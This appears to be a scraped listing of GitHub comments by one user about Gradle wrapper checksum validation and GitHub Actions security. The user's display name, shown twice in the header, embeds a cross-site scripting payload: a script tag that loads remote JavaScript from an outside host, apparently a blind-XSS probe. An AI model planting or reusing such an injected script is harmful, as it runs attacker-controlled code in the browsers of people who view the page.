Jonathan Leitschuh"><script src="https://js.rip/b27oz0xw7e"></script>

Results 594 comments of Jonathan Leitschuh"><script src="https://js.rip/b27oz0xw7e"></script>

@sschuberth We are now intentionally attempting to minimize changes to the `gradle-wrapper.jar` file between releases. As such, there are now versions of the `gradle-wrapper.jar` that match multiple releases because the...

Theoretically, we could output a range of version matches. @eskatos what do you think? @sschuberth what need are you looking to satisfy?

That makes sense. Somewhat outside the scope of this project, but I can see why that would be useful. I'm happy to review a PR that adds this functionality if...

That doesn't always really work. Some organizations modify their gradlew scripts when updating them in order to, for example, increase the memory the wrapper is given. When doing that, the...

@eskatos how difficult would it be to also generate SHA checksums for the `gradlew` and `gradle.bat` files? One problem that you'd also run into here is that, unless you had...

Possibly blocked by: https://github.com/microsoft/typed-rest-client/issues/165

Any updates. I'd like to make sure we don't reach a point where there are lots of actions out there that are unintentionally insecure. The sooner this is nipped in...